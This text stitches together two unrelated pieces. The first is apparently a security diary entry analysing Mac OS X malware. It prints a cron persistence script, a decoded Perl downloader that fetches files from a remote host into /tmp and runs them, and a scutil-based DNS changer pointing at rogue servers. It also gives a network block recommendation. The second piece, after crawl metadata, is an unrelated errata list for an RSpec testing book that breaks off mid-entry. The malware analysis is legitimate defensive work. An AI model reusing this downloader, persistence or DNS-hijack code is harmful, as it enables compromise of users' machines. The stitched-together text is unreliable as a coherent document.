really is no need to change these parameters, but with future samples this may become critical to maintain "state" from the attackers perspective. EVIL="applemac" path="/Library/Internet Plug-Ins" exist=`crontab -l|grep $EVIL` if [ "$exist" == "" ]; then echo "* */5 * * * \"$path/$EVIL\" 1>/dev/null 2>&1" > cron.inst crontab cron.inst rm cron.inst fi tail -21 $0 | uudecode -o /dev/stdout | sed 's/7777/bsd/' | sed 's/typeofrun/gnu/' | perl && exit begin 666 jah M(R$O=7-R+V)I;B]P97)L"G5S92!)3SHZ4V]C:V5T.PIM>2`D:7`](CDT+C$P **** SNIPPED CONTENTS ***** )("`@('T*?0H* ` end So what this file does is create a cronjob that runs every five minutes that executes a perl script named AdobeFlash located in /Library/Internet Plug-Ins (remember those sed regular expressions!). Using the steps we used above to save and uudecode the encoded text we can take a look at the contents of "jah" that is at the bottom of the "withlove" file. Decoded contents #!/usr/bin/perl use IO::Socket; my $ip="XXX.XXX.XXX.XXX",$answer=""; my $runtype=typeofrun; sub trim($) { my $string = shift; $string =~ s/\r//; $string =~ s/\n//; return $string; } my $socket=IO::Socket::INET->new(PeerAddr=>"$ip",PeerPort=>"80",Proto=>"tcp") or return; print $socket "GET /cgi-bin/generator.pl HTTP/1.0\r\nUser-Agent: "**SNIPPED CONTENT**;$runtype;7777;**SNIPPED CONTENT**;\r\n\r\n"; while(<$socket>){ $answer.=$_;} close($socket); my $data=substr($answer,index($answer,"\r\n\r\n")+4); if($answer=~/Time: (.*)\r\n/) { my $cpos=0,@pos=split(/ /,$1); foreach(@pos) { my $file="/tmp/".$_; open(FILE,">".$file); print FILE substr($data,$cpos,$_); close(FILE); chmod 0755, $file; system($file); $cpos+=$_; } } Well what we have here is basically a perl based "download a file from here with this User-Agent string, and then execute the results" script. So lets take a quick look at the perl script. (I AM NOT A PERL GURU!!!) From a mitigation/alerting side the more interesting parts are the URL/Host/User-Agent (I have modified the User-agent code so it WILL NOT WORK AS IS!) combination that is used to pull down code and execute it. From a forensic's point of view it is interesting to note that the default location for the file to be downloaded to is /tmp/. So being a bit curious I wanted to see what the script was pulling down and executing, but since I was working on windows I needed to either have perl (and modify the above script a bit), or I would have to bust out my trusty pal python and write my own script to pull down the file. I opted for the python route which produced the following horrible code. import httplib import urllib2 import sys outfilename = sys.argv[1] outFile = open( outfilename, 'a') request = urllib2.Request('') opener = urllib2.build_opener() request.add_header('User-Agent','**SNIPPED CONTENT**;typeofrun;7777;**SNIPPED CONTENT**;') data = opener.open(request).read() outFile.write(data) print "Wrote file %s" % outfilename exit So once we have the above python code in a file we can execute it via python.exe like follows. C:\Python26>python "C:\Documents and Settings\**SNIPPED CONTENT**\Desktop\macmalware\ripper.py" outfile.txt Wrote file outfile.txt We can now take a look at outfile.txt to see what is being pulled down and executed. so a quick more outfile.txt produces the following results #!/bin/sh tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.vl | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.pin | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit begin 777 mac M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H* **SNIPPED CONTENTS** 14TE$+T1.4PIQ=6ET"D5/1@H` ` end Well it looks like we are back in familiar territory (did you read those two previous diary entries?) as far as using tr. Lets decode the contents of "mac" that is appended to the bottom of the file we pulled down. (again using the UUDECODE.exe) Contents of mac #!/bin/sh path="/Library/Internet Plug-Ins" VX1="TEERTS" VX2="CIGAM" PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF open get State:/Network/Global/IPv4 d.show quit EOF ) /usr/sbin/scutil << EOF open d.init d.add ServerAddresses * $VX1 $VX2 set State:/Network/Service/$PSID/DNS quit EOF Well low and behold it would appear that this entire process of various UUENCODED blobs of text all lead to this. We have a DNS changer that uses scutil's cli interface to modify a OSX machines dns entries. Please do take note that "TEERTS" and "CIGAM" would be replaced with the results of the tr commands in the shell script that we pulled down. (outfile.txt) The values of VX1 and VX2 in THIS SAMPLE would be VX1=85.255.112.95 VX2=85.255.112.207, now takes these DNS servers with a grain of salt, as it is EXTREMELY EASY for the attackers to change these values. They have done this at least 3 times in the last 24 hours, so it may be wise to simply block DNS traffic to 85.255.112.0 - 85.255.127.255 which is the netblock owned an operated by UkrTeleGroup. (The hot new freshness in bad juju) I would also like to thank reader Steve Lyst for pointing this out and sharing his experience when I was working on this diary entry.
http://www.dshield.org/diary.html?date=2008-11-25
CC-MAIN-2016-30
refinedweb
2,468
70.43
Overall developer experience, the community and documentation “It just works” Most of the stuff that ZK offers works very well, and the functionality is usually very intuitive to use if you have developed any desktop Java applications before. In 2007 I did a comparison of RIA technologies that included Echo2, ZK, GWT, OpenLaszlo and Flex. Echo2 and OpenLaszlo felt incomplete and buggy and didn’t seem to have proper Maven artifacts anywhere. GWT seemed more of a technical experiment than a good platform to build on. Flex was dropped because some important Maven artifacts were missing and Flash was an unrealistic requirement for the application. On the other hand, ZK felt the most “natural” and I was able to quickly get productive with it. During my 4 year long journey with ZK, I’ve gotten plenty of those “wow” moments when I’ve learned more and more of ZK and improved my architectural understanding of the framework. Nowadays I’ve got a pretty good understanding of what in ZK works, what doesn’t, and what has problems and what doesn’t. But still, after gaining all this good and bad insight, I consider ZK to be a very impressive product out of the box. The downside of this is of course the fact that the framework hides a lot of things from newcomers in order to be easy to use, and some of these things will bite you later on, especially if your application has lots of users. It’s very, very, very flexible ZK is very flexible and has plenty of integrations. Do you want use declarative markup to build component trees? Use ZUL files. Do you want to stick to plain Java? Use richlets. You can also integrate JSP, JSF, Spring, and use plenty of languages in zscript. The core framework is also pretty flexible and you can override a lot of stuff if you run into problems. The downside is that there are very many ways of doing things correctly, and even more ways of screwing up. Flexibility itself is not a negative point, but I think that the ZK documentation doesn’t guide users enough towards the best practices of ZK. What are the best practices anyway? Many tutorials use zscript, but the docs also recommend to avoid it due to performance reasons. The forum is quite active I think that the ZK forum is one of the best places to learn about ZK. It’s pretty active and the threads vary from beginner level to deep technical stuff. I read the forums myself almost every day and sometimes help people with their problems. There’s one thing that troubles me a bit: the English language in the forums isn’t usually very good and people often ask too broad questions. I know, it’s not fair to criticize the writings of non-native English speakers, especially when I’m not a native speaker myself. Regardless, I think that such a barrier exists. For example, take 5 random threads from the ZK forum and Spring Web forum. The threads in the Spring forums are typically more detailed and focused instead of “I’m a newbie and I need to create application x with tons of features, please tell me how to do everything”-type threads you see in the ZK forums and people clearly spend some time formulating good and detailed questions. You’ll see that you have to spend a bit more time in the ZK forum in order to understand the threads. It’s not anybody’s fault or anything, nor a bad thing, this is just an observation. Unfortunately for me it means that some of my limited time I have for the ZK community is spent just trying to understand what people are saying. Usually I answer a thread only when I know the answer right away, or if the thread concerns some deep technical stuff. There’s plenty of documentation In the past the ZK documentation was scattered, out of date and some of the more important stuff was completely missing. In the recent years the docs have improved a lot, and there’s now separate comprehensive references for ZK configuration, client-side ZK, and styling. I think the documentation is today very good, and most basic questions can be easily answered by reading the docs. As I mentioned above, ZK has a tendency to “just work”. The overall technical quality is impressive and on par with most Java web frameworks, but I believe there are some parts of ZK that are less impressive. Stuck on Java 1.4 ZK is built with Java 1.4, which greatly limits the flexibility of their API and internal code quality Negative effects on ZK internal code - ThreadLocals not removed with remove() (calling set(null) does prevent leaking the contained object but does not properly remove a ThreadLocal)! - Lots of custom synchronization code where simple java.util.concurrent data structures or objects would work (ConcurrentHashMap, Semaphore, Atomic*, etc) - StringBuffer is used where StringBuilder would be appropriate No annotations Personally I’m not a fan of annotation-heavy frameworks because annotations are an extralinquistic feature and usually you end up annotations with string-based values that have no type safety. However, I know that some people would be overjoyed to have an API based on them. No enums There are many places in the ZK API where proper enums would be much better than the hacks that are used at the moment. The worst offender is Messagebox. Just look at this signature: public static int show(String message, String title, int buttons, java.lang.String icon, int focus) Ugh..the magic integers remind me of SWT (which is a great library with an awful API). Let’s imagine an alternative version with enums and generics: public static Messagebox.Button show(String message, String title, Set<Messagebox.Button> buttons, Messagebox.Icon icon, Messagebox.Button focus) Much, much better and more typesafe. No more bitwise OR magic. I could code this in 10 minutes into ZK if it would use Java 1.5. No generics This is the worst part of being stuck on Java 1.4. I’ll just list some of the places where I’d like to see generics: Collection values in API signatures Example in org.zkoss.zk.ui.util.Initiator: void doInit(Page page, Map args); vs void doInit(Page page, Map<String, Object> args); Example in org.zkoss.zk.ui.Component: List getChildren(); vs List<Component> getChildren(); Collection-like classes Example in ListModel: public interface ListModel { ... Object getElementAt(int index); ... } vs public interface ListModel<T> { ... T getElementAt(int index); ... } All ListModel* classes should also be generic (most extend java.util.Collection). org.zkoss.zk.ui.event.EventListener public interface EventListener { public void onEvent(Event event); } vs public interface EventListener<T extends Event> { public void onEvent(T event); } org.zkoss.zk.ui.util.GenericAutowireComposer public class GenericAutowireComposer { protected Component self; ... } vs public class GenericAutowireComposer<T extends Component> { protected T self; ... } All *Renderer classes Example in org.zkoss.zul.RowRenderer: public interface RowRenderer { void render(Row row, Object data); } vs public interface RowRenderer<T> { void render(Row row, T data); } Unimpressive server push implementations The default PollingServerPush has latency and will absolutely kill your application server if there are many active users. CometServerPush is better, but it does not use non-blocking IO and will block servlet threads in your servlet container. Let’s put this into perspective: Tomcat 7.0 default configuration sets connector max threads to 200. This means that if you have 200 comet-enabled desktops, Tomcat will stop responding to other requests because all the threads are in use by comet. If the implementation used Servlet 3.0 or container-specific async APIs instead, you could run Tomcat even with one thread. It would of course be slow but it would not stop working! Also, CometServerPush requires ZK EE so regular users are stuck with PollingServerPush. I’d say that’s a pretty big limitation considering how server push is marketed. However, it’s not surprising: proper non-blocking comet is hard to implement and requires non-blocking components in all parts of the pathway from the browser to the servlet code. Zscript I don’t like zscript. It might have been a good feature many years ago, but I believe that today it should not be used at all. Why, oh why would someone want to replace typesafe compiled Java code with non-typechecked zscript mixed with ZUL templates? - “I can use Python/Ruby/…”. This might be a valid point for some people but you’ll end up with unmaintainable code mangled inside ZUL templates - “Changes are visible when you save the file”. True, but I would never sacrifice so much just for this feature. And besides, you can get a similar effect with JRebel. So, if you put “Java code” (=BeanShell code) in zscript, you might want to rethink that. Reliance on reflection Many useful features rely on reflection, which limits what things the compiler can check for you. This is very typical thing in many Java libraries/frameworks, so it’s not really a ZK-specific thing. As a Scala user I can see how the limitations of Java have guided most frameworks to the path of reflection/annotations. Reflection cannot always be avoided but I think it’s a bad sign if most of the useful features rely on reflection. Here are some features in ZK that use reflection: - Any kind of event listening that does not use component.addEventListener. This includes any classes that extend GenericEventListener (such as all ZK-provided Composer classes except MultiComposer) - Data binding - EL expressions in ZUL templates.
https://www.javacodegeeks.com/2012/01/zk-web-framework-thoughts.html/comment-page-1/
CC-MAIN-2016-30
refinedweb
1,618
63.29
More - 1 The Video: Data types and user input in Java - 2 The Final Program Used in the Video - 3 Exercise - 4 Comment - 5 Transcription of the Audio of the Video - 5.1 The program involving user input in Java - 5.2 The variable: name - 5.3 The variable: age - 5.4 The variable: income - 5.5 Scanner for user input in Java - 5.6 Asking the user for her/his name - 5.7 Getting a String user input in Java using a Scanner object - 5.8 Asking for the age of the user - 5.9 Partial program - 5.10 Getting the age of the user using a Scanner object - 5.11 Asking for income information of the user - 5.12 Getting the income of the user using a Scanner object - 5.13 Displaying everything - 5.14 Output of the program - 5.15 A limitation of the program - 5.16 Sample output to demonstrate the limitation - 5.17 Final remarks The Video: Data types and user input in Java In the previous video, we introduced how to get a double user input in Java. In the following video, we will see how we can write a code to get “input” for several different types of variables. The Final Program Used in the Video We are providing the final program used in the video below. The program engages in a conversation with the user. Through the code, you will get an idea of user input in Java for several types of variables. Save the file as MyProg.java. import java.util.Scanner; class MyProg{ public static void main(String[] args){ String name; byte age; double income; Scanner sc = new Scanner(System.in); System.out.println("What is your name"); name=sc.nextLine(); System.out.println("Hi, "+name+" how old are you?"); age=sc.nextByte(); System.out.print("If you do not mind, "+name+", "); System.out.println("what is your monthly income?"); income=sc.nextDouble(); System.out.print("Great! "+name+", "); System.out.print("you are "+age+" years old, "); System.out.println("and you earn "+income+" each month."); } } Exercise Extend the program we wrote in the video such that, in the final message, the computer provides the annual salary of the user instead of the monthly wage. That is, the user will provide the monthly salary, and the program will calculate and display what the yearly salary will be. Comment We will cover mathematical operations in a future video. To stay in touch, please subscribe to Computing4All.com. Enjoy! Transcription of the Audio of the Video Hi, I am Dr. Monika Akbar. I am the other instructor in this video lecture series. Dr. Hossain has already explained two types of variables — integers and “double” numbers — in the previous lectures. Integers are round numbers. We write the integer data type as “int”. Doubles are numbers that have decimal values. From the last video lecture, you already know how to get input from the user. Today, we will discuss a few more variable types, and we will learn how to get “user input” for different kinds of variables. The program involving user input in Java We will write a simple program, in which we will declare a few variables of different kinds. I will explain the differences between the variable data types on the way. Let us go to my desktop computer. I will share my desktop with you now. The program, I will write today, is quite simple. For clarity, it is better if I show you the program output right now and then I will show you how I coded the program. The program engages in a conversation with the user. At first, the program asks for the name of the user. Then the program will ask the user for age. Afterward, the program will ask to provide the monthly salary of the user. Notice that the program asks the second and the third question addressing the user by name. The questions have a conversation style. Today, we will see how to write this program. The file I am using is MyProg.java. Therefore, the class is MyProg. I am writing my main method. Inside the main method, I will write my code. The variable: name At first, I will declare the variables we will need for the program. As I said, the program will prompt for the name of the user. After the user provides a name, the program will greet the user using the name. That means the program needs to remember the name of the user. That is, the program needs a variable to remember the name. A name may have an arbitrary number of letters in it. For natural language inputs that may contain any number of letters or symbols, Java has a particular data type. The data type is called String. A String can hold practically any text, such as a name, or an address, or an essay. For the name, I will use a String variable. I am writing the data type, which is String, then I am typing the variable name, which is the word “name”, and then I am writing a semicolon. The variable “name”, will capture the name of the user. For the name, I will use a String variable. I am writing the data type, which is String, then I am typing the variable name, which is the word “name”, and then I am writing a semicolon. The variable “name”, will capture the name of the user. The variable: age The second variable I need is for the age of the user. I can use “int” or I can use double, but I would use another data type here to store the age of the user. The other data type, which is also a number type with a round value, is called “byte”. The byte data type can hold numbers that are no larger than 127 and no lesser than negative 128. Since age is most likely to be less than 128, I will use a byte data type to remember the age of the user. Note that we could use an integer too, but I wanted to introduce this new variable type to you. This is why we are using byte for the age. I am giving the variable a name “age”. Then I type a semicolon. I should again mention that byte store round numbers. That is the age has to be a round number, without any decimal point. The variable: income The third variable we will use is to store the income of the user. Income can be a large number. Therefore, I will use double. I am typing double income; then I put a semicolon. Scanner for user input in Java We now have three variables: name, age, and income. Notice that each of these variables has a different data type. Now, we will create a Scanner just like we did in the previous video. Recall from the last video that we have to include the Scanner class with our program so that this program can use the functionality written inside the Scanner class. At the top of my code, I am adding import java.util.Scanner and then putting a semicolon. Now, we can create a Scanner object that will help us get user input of any data type. Today, I will give the Scanner object the name sc. I am typing Scanner sc= new Scanner (System.in); sc is an object variable of type Scanner. sc would help us get user input. In the last video, we provided some explanation on this line. Asking the user for her/his name Now, I am going to write a question using System.out.println. That is, the program will ask this question to the user. Within System.out.println, I am writing, “What is your name?” At this point, if we compile and run the program we will just see that the program is printing “What is your name?” Then the program will end immediately, given that we haven’t told the computer to do anything yet. After “What is your name?” is printed on the terminal, we want the program to get input from the user. That is the user will Type her or his name using a keyboard and the program should save the name in the variable we have to store name. We know that we have to use our Scanner object sc here. Getting a String user input in Java using a Scanner object We need to write the variable name in the left side, and then on the right side, we need to write whatever scanner functionality we want to write to get the input from the user. The right side of the assignment operator is always executed first. In the left side, you only keep one variable, in this particular case, the variable “name”. In the right side, I am typing sc dot nextLine(). That is “sc”, the Scanner object, has the capability to read a line of text. The capability is summoned by the nextLine() method. Now the right side of the assignment operator will be executed first, which practically will keep waiting until the user types and enters her or his name. Once the user types some text, the sc.nextLine() method captures it and creates a string. The assignment operator sends the string captured by the sc.nextLine() method to the “name” variable in the left side. Asking for the age of the user Now that the program remembers the name string the user provided in the name variable, the program can address the user by her or his name. I am going to write the next question that the program will ask, using a System.out.println method. The next question is, How old are you? This is great but I would like to include the name of the user in this question. For example, Hi John, How old are you? To do that, we will somehow include the name of the user in this System.out.println method. Remember from the last video that, whatever we want to print “as it is” goes inside the quotations. To print the variable content, we directly provide it outside the quotations. We concatenate quotations parts with the variables using a plus symbol. Since I want to say, “Hi”, I put Hi inside the quotation. Then I want my program to say, the name of the person who is running the program. The name of the person is saved in the String variable name. Therefore, I type the plus symbol concatenate the name with Hi. Then I write another plus symbol to concatenate the last part where the program will say, “How old are you?” Partial program Let us compile the program and run it to see what happens. The program asks the user for her name. The user types her name, Jane Doe, and presses the enter button. Then the program addresses the user by name, saying “Hi, Jane Doe, how old are you?” Then the program ended its execution. That is because we did not write anything in the code to get user input for age. Let us go back to the code and work on the rest of the code. Getting the age of the user using a Scanner object Remember that the variable age is a byte data because we declared it as a byte. I am typing age equals, then on the right side, I will write something using the Scanner object to get a byte size number from the user. The command is nextByte. I type sc.nextByte(); The age variable will contain the age provided by the user. Asking for income information of the user Now, the next line, within System.out.print I am writing “If you do not mind,” in quotations and then I append the name of the person, and then I append a comma only. Notice that I have use System.out.print not System.out.println here. After this line is executed, there will be no new line. Whatever I will print next will be printed in the same line in the output. Now I am writing a System.out.println, inside which, within the quotations, I am writing “what is your monthly income?” After this is printed, the prompt will go to the next line because we have used System.out.println, not System.out.print. Getting the income of the user using a Scanner object Anyway, at this point, the program should prompt for income. To get user input for income, we write income=sc dot . Now notice that we declared the income variable as a double. Therefore, we will write sc.nextDouble(); to get a double input from the user. This line will get the double input from the user and put it inside the income variable. Displaying everything Now that the program has everything, name, age, and, the income of the user. The program can display any message using these information pieces. I will write two System.out.print methods and one System.out.println method to display what we want to tell the user. We will say, “Great! “, then we want the program to state the name of the user, so we append the name varaible. In the next System.out.print method we want our program to say, you are this many years old. In the “this many” part, we want the program to write the age that the user provided. Finally, in a System.out.println we will write “and you earn this much each month.” In place of this much, we want the program to print the income that the user provided, which is stored in the income variable. I use a System.out.println to make sure that after the last thing printed on the terminal, the command prompt goes to a new line. Output of the program Let us save the file MyProg.java. Compile it and then run it. Notice, how it is working. The program asks the user for her name. The user provides the name, Jane Doe. Then, in the next question, the program uses the name of the user and asks for her age. The user provides her age. Then the program uses the name again for the third question. This time, it asks the user for her monthly income. The user provides a monthly income of, say 20000. After the user enters the income, the program prints this nice message. Great! Jane Doe, you are 20 years old and you earn 20000 each month. A limitation of the program While this is a nice program, it has some flaws. It is always good to know the limitations of your programs. The more you know the limitations, the better you can make it foolproof. We will not make it foolproof today because we have not yet covered all the necessary topics to be able to make a program foolproof. Over time, we will learn more items, such as how to apply conditions and looping, that will help us make a program bug-free. As I said earlier, the data type, byte, cannot hold any number greater than 127. If there is a lucky person in the world who is using the program and has age greater than 127, then the program will behave abnormally. Let us see. Sample output to demonstrate the limitation Let us say, the name of the person is John Doe. John types his age, which is 128. As soon as John hits the enter button after typing his age, the program shows an error and terminates. Notice that the error states “Value out of range. Value:”128″” Every variable has a limit. On the screen, we have provided a list of data types and the range of numbers each data type supports. Notice that byte supports numbers between negative 128 to positive 127. A short data type supports numbers between negative 32,768 to positive 32,767. Data types int, long, float, and double support larger and larger ranges of numbers. float and double have an extra power; they can handle decimal numbers, while byte, short, int, and long are only for round numbers. Please visit the supporting page on Computing4All.com for today’s lecture for additional resources. Final remarks We always tell our students at the bachelor’s level, many of whom are just starting to learn a programming language, to have patience and keep practicing. Practice makes everyone perfect. The learning principle is the same for everyone, whether the person is self-learning a programming language, or the person is learning it in a course. If you are learning all by yourself and watching this video as additional material, please know that we are making these videos, especially for you, because we know that you have little to no help. My suggestion is, please please please practice while you are watching our programming videos. After practicing what we cover in the videos, please go beyond and above to write another program of your choice, using the knowledge you gained so far. If you find our videos informative, please give us a thumbs up, subscribe to Computing4All.com, and our YouTube channel. If you have any question, please send us a message via Computing4All.com or by simply writing a comment in the Comments section below. Thank you for watching the video.
https://computing4all.com/more-on-data-types-and-user-input-in-java-video-lecture-4/
CC-MAIN-2022-40
refinedweb
2,912
75.5
How property, the IRS will want an explanation. Line 8: If any insurance on the decedent’s life isn’t included on the return (because the insurance wasn’t owned by the decedent), answer “yes” on line 8a. Also complete Schedule D. Attach as an exhibit Form 712, Life Insurance Statement and an explanation of why the policy isn’t includible in the estate. On line 8b, follow the same process for any policy that the decedent owned on the life of another that isn’t being included in the estate. Line 9: If the decedent held property as a joint tenant with right of survivorship, one of the joint tenants was not the surviving spouse, and you’re including less than the full value of the property on the return, answer “yes” on line 9. Also report it on Schedule E. Line 10: Line 10a asks whether the decedent owned an interest in a partnership or unincorporated business or stock in an inactive or closely held corporation. On line 10b, disclose whether you discounted the value of any of these interests for any reason. If you did, consult Schedule F. You’re entitled to take a market discount, but be prepared for an audit. Line 11: Complete and attach Schedule G if the decedent made any transfers during life under Sections 2035 (adjustments for certain gifts made within three years of death), 2036 (transfers with a retained life estate), 2037 (transfers taking effect at death), and 2038 (revocable transfers). Consult your tax advisor. Line 12: On line 12a, answer “yes” if any decedent-created trusts existed at the decedent’s death. Attach a copy of the trust as an exhibit. For line 12b, answer “yes” if the decedent possessed any powers, beneficial interest (interest whereby the decedent benefitted form the trust), or trusteeship (decedent was a trustee of a trust) under any trusts created by someone else. Line 12c asks whether a GST taxable termination occurred on the death of the decedent. If so, obtain a copy of the trust and attach it as an exhibit along with the name, address, TIN, and phone number of the trustees of that trust. If the decedent transferred or sold an interest in a partnership, limited liability company, or closely held corporation to a trust described in lines 12a or 12b, provide the Employer Identification Number (EIN) of that entity on line 12e. Check with your tax advisor. Line 13: If the decedent possessed a general power of appointment, complete Schedule H. A general power of appointment is a power to appoint the assets of a trust in favor of anyone, including the holder of the power. Many people use it in marital trusts for the surviving spouse because it qualifies the trust for the marital deduction. .Line 14: If the decedent owned, or had any interest in, a foreign bank or brokerage account, answer this question “yes.” The IRS is not asking about foreign stock ownership here. Line 15: If the decedent was receiving either an annuity (income paid in a series of payments) as described in the instructions from Schedule I or a private annuity, complete and attach Schedule I. Line 16: If the decedent was ever the beneficiary of a trust created by a predeceased spouse for whom the marital deduction was claimed, and the trust isn’t reported on this 706, answer “yes” here and attach an explanation as an exhibit.
http://www.dummies.com/personal-finance/estate-planning/how-to-complete-lines-816-of-part-4-estate-form-706/
CC-MAIN-2017-43
refinedweb
573
58.72
The wmemchr() function is defined in <cwchar> header file. const wchar_t* wmemchr( const wchar_t* ptr, wchar_t ch, size_t count ); wchar_t* wmemchr( wchar_t* ptr, wchar_t ch, size_t count ); The wmemchr() function takes three arguments: ptr, ch and count. It locates the first occurrence of ch in the first count wide characters of the object pointed to by ptr. If the value of count is zero, the function returns a null pointer. If the character is found, the wmemchr() function returns a pointer to the location of the wide character, otherwise returns null pointer. #include <cwchar> #include <clocale> #include <iostream> using namespace std; int main() { setlocale(LC_ALL, "en_US.utf8"); wchar_t ptr[] = L"\u0102\u0106\u0126\u01f6\u021c\u0246\u0376\u024a"; wchar_t ch = L'Ħ'; int count = 5; if (wmemchr(ptr,ch, count)) wcout << ch << L" is present in first " << count << L" characters of \"" << ptr << "\""; else wcout << ch << L" is not present in first " << count << L" characters of \"" << ptr << "\""; return 0; } When you run the program, the output will be: Ħ is present in first 5 characters of "ĂĆĦǶȜɆͶɊ"
https://cdn.programiz.com/cpp-programming/library-function/cwchar/wmemchr
CC-MAIN-2019-47
refinedweb
176
64.75
When used like this: import static com.showboy.Myclass; public class Anotherclass{} what’s the difference between import static com.showboy.Myclass and import com.showboy.Myclass? See Documentation The static import declaration is analogous to the normal import declaration. Where the normal import declaration imports classes from packages, allowing them to be used without package qualification, the static import declaration imports static members from classes, allowing them to be used without class qualification.. There is no difference between those two imports you state. You can, however, use the static import to allow unqualified access to static members of other classes. Where I used to have to do this: import org.apache.commons.lang.StringUtils; . . . if (StringUtils.isBlank(aString)) { . . . I can do this: import static org.apache.commons.lang.StringUtils.isBlank; . . . if (isBlank(aString)) { . . . Static import is used to import static fields / method of a class instead of: package test; import org.example.Foo; class A { B b = Foo.B_INSTANCE; } You can write : package test; import static org.example.Foo.B_INSTANCE; class A { B b = B_INSTANCE; } It is useful if you are often used a constant from another class in your code and if the static import is not ambiguous. Btw, in your example “import static org.example.Myclass;” won’t work : import is for class, import static is for static members of a class. The basic idea of static import is that whenever you are using a static class,a static variable or an enum,you can import them and save yourself from some typing. I will elaborate my point with example. import java.lang.Math; class WithoutStaticImports { public static void main(String [] args) { System.out.println("round " + Math.round(1032.897)); System.out.println("min " + Math.min(60,102)); } } Same code, with static imports: import static java.lang.System.out; import static java.lang.Math.*; class WithStaticImports { public static void main(String [] args) { out.println("round " + round(1032.897)); out.println("min " + min(60,102)); } } Note: static import can make your code confusing to read. the difference between “import static com.showboy.Myclass” and “import com.showboy.Myclass”? The first should generate a compiler error since the static import only works for importing fields or member types. (assuming MyClass is not an inner class or member from showboy) I think you meant import static com.showboy.MyClass.*; which makes all static fields and members from MyClass available in the actual compilation unit without having to qualify them… as explained above The import allows the java programmer to access classes of a package without package qualification. The static import feature allows to access the static members of a class without the class qualification. The import provides accessibility to classes and interface whereas static import provides accessibility to static members of the class. Example : With import import java.lang.System.*; class StaticImportExample{ public static void main(String args[]){ System.out.println("Hello"); System.out.println("Java"); } } With static import import static java.lang.System.*; class StaticImportExample{ public static void main(String args[]){ out.println("Hello");//Now no need of System.out out.println("Java"); } } See also : What is static import in Java 5 Say you have static fields and methods inside a class called myClass inside a package called myPackage and you want to access them directly by typing myStaticField or myStaticMethod without typing each time myClass.myStaticField or myClass.myStaticMethod. Note : you need to do an import myPackage.MyClass or myPackage.* for accessing the other resources The static modifier after import is for retrieving/using static fields of a class. One area in which I use import static is for retrieving constants from a class. We can also apply import static on static methods. Make sure to type import static because static import is wrong. A very good link to know about import static is
https://exceptionshub.com/what-does-the-static-modifier-after-import-mean.html
CC-MAIN-2022-05
refinedweb
636
50.02
Help. can anyone make this work correctly. It suppose to ask for amount due, then payment is made and it should tell how much change is due in dollars, quarters, dimes, nickles and pennies Code: #include <iostream> using namespace std; int main() { int owe = 0.0; int paid = 0.0; int change = 0.0; int dollar = 0 ; int quarter = 0 ; int dime = 0 ; int nickle = 0; int penny = 0; //enter input items cout << "Enter Amount Owed: " ; cin >> owe; cout << "Enter Amount Paid: " ; cin >> paid; //calculate total owed in change change = paid - owe; dollar = change / 1; quarter = (change - dollar) / .25; dime = (change - dollar - (quarter * .25)) / .1; nickle = (change - dollar - (quarter * .25) - (dime * .1)) / .05; penny = (change - dollar - (quarter * .25) - (dime * .1) - (nickle * .05)) / .01; //display output items cout << "change: " << change << endl; cout << "dollar(s): " << dollar << endl; cout << "quarter(s): " << quarter << endl; cout << "dime(s): " << dime << endl; cout << "nickel(s): " << nickle << endl; cout << "penny(s): " << penny << endl; return 0; }
http://cboard.cprogramming.com/cplusplus-programming/135558-i-need-help-homework-printable-thread.html
CC-MAIN-2016-30
refinedweb
157
80.01
-Dec-19) Paper page: xvi Last page of the preface xvi, in the "Online Resources" section, the title of the book is misspelled. The typo is 'The Pragmatic Bookhself" - Reported in: P1.0 (09-Dec-18) PDF page: 0 Paper page: 0 I'm reading via Safari do I don't have a page number to provide, sorry. In the section "Where to start" it lists some matchers, then says: "Any of these matchers except raise_error can be negated by using not_to instead of using to." But raise_error can be negated, e.g. expect { foo }.not_to raise_error--Andy Waite - Reported in: P1.0 (09-Dec-18) PDF page: 0 Paper page: 0 In the second "The Second Test", it says "this example will fail since the two let blocks are never invoked". But even if they were invoked using "let!", the test would still fail because it's use 'new' rather than 'create'. I'm reading via Safari do I don't have a page number to provide, sorry.--Andy Waite - Reported in: P1.0 (03-Dec-18) Paper page: 25 Just after defining "class Task", the next paragraph includes: > also clear up the following failure, that project.done? doesn't exist. The #done? method already exists, defined in class Project on page 23. Perhaps the phrase meant to be something like "doesn't change" or "doesn't reflect the done state of the project".--Adam Marker - Reported in: P1.0 (22-Mar-20) PDF page: 29 You have two specs here. The first says that a brand-new tests is not complete. The second creates a different test object, marks it as complete, and expects that it is than complete. I think it should say brand-new tasks instead of tests. Same thing with creates a different test object, probably you mean a task object instead (not sure here, maybe you really meant a test object on this second occurence) . And finally a small typo at the end of the paragraph: then instead of than.(that it is then complete). --Andreas Raisl - Reported in: P1.0 (21-Apr-18) PDF page: 32 If you run the tests at this point, typing everything in exactly, you get an error with the Project#total_size method. Specifically, the error is: "nil can't be coerced into Integer". This also happens with Project#remaining_size. If I look at the Task object being passed in, it does have a size. For example: Task:0x00... @completed=true, @size=2 So size is most definitely not nil. I have double-checked the code as it is provided in the book and I have a line by line comparison showing no difference in code at all. And, again, you can see the object representation I'm getting above, so I definitely have @size and it definitely has a value. So I have to assume I'm not reading the error correctly. --Jeff Nyman - Reported in: P1.0 (12-Mar-18) Paper page: 32 In the first paragraph, the author writes "This test fails first on the creation of Task.new(size:2, completed:true)" when in-fact, using the code as it is written up to the that point, the test actually passes. --Taylor L. - Reported in: B2.0 (30-Jan-18) PDF page: 35 be_part_of_velocity doesn't match code from block on page 34, which states be_a_part_of_velocity--Aaron Kelton - Reported in: P1.0 (22-Apr-18) Paper page: 96 Sizable is misspelled throughout this chapter which impacts the module name and filename. Which is the main issue. But most importantly, the code snippet on page 96 uses the correct spelling, which is inconsistent with the previous code. Here, "sizable" should be "sizeable" to match the other incorrect spellings. (I'm curious about how the misspelling made it through the spell check process.)--Yong Bakos - Reported in: P1.0 (22-Apr-18) Paper page: 97 At this point in the test, there is a method Project#total_size. But this section depends on a Project#size method, which the custom matcher uses. Running this code results in a NoMethodError. The test should guide readers into implementing a Project#size method or the custom matcher should be rewritten around the #total_size semantics. --Yong Bakos - Reported in: P1.0 (22-Apr-18) Paper page: 98 was #{actual} should be was #{actual.size} Otherwise the test failure message displays the object representation and not the meaningful actual value. --Yong Bakos - Reported in: P1.0 (11-Oct-19) PDF 